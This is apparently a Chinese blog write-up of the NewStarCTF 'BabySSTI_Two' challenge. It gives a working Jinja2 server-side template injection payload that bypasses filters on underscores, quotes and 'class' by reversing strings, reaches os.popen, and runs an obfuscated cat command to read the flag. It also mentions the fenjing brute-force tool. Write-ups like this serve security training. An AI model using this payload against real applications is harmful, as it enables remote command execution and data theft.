[NewStarCTF 公开赛赛道]BabySSTI_Two

2025-01-29- 2025-02-03

122- 1m- -

根据题目提示，这是一个ssti的题

经过测试，我们发现这是个jinjia2的模版，并且过滤了下划线和双引号和class

我们可以用字符串逆序来绕过

1	?name={{''['__ssalc__'[::-1]]['__sesab__'[::-1]][0]['__sessalcbus__'[::-1]]()[117]['__tini__'[::-1]]['__slabolg__'[::-1]]['nepop'[::-1]]('ca${Z}t${IFS}/fl${Z}ag_in_h3r3_52daad').read()}}

更简单的，用fenjing进行爆破

Post author: kinsey
Post link: https://kinsey973.github.io/2025/01/29/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-BabySSTI-Two/
Copyright Notice: All articles in this blog are licensed under unless otherwise stated.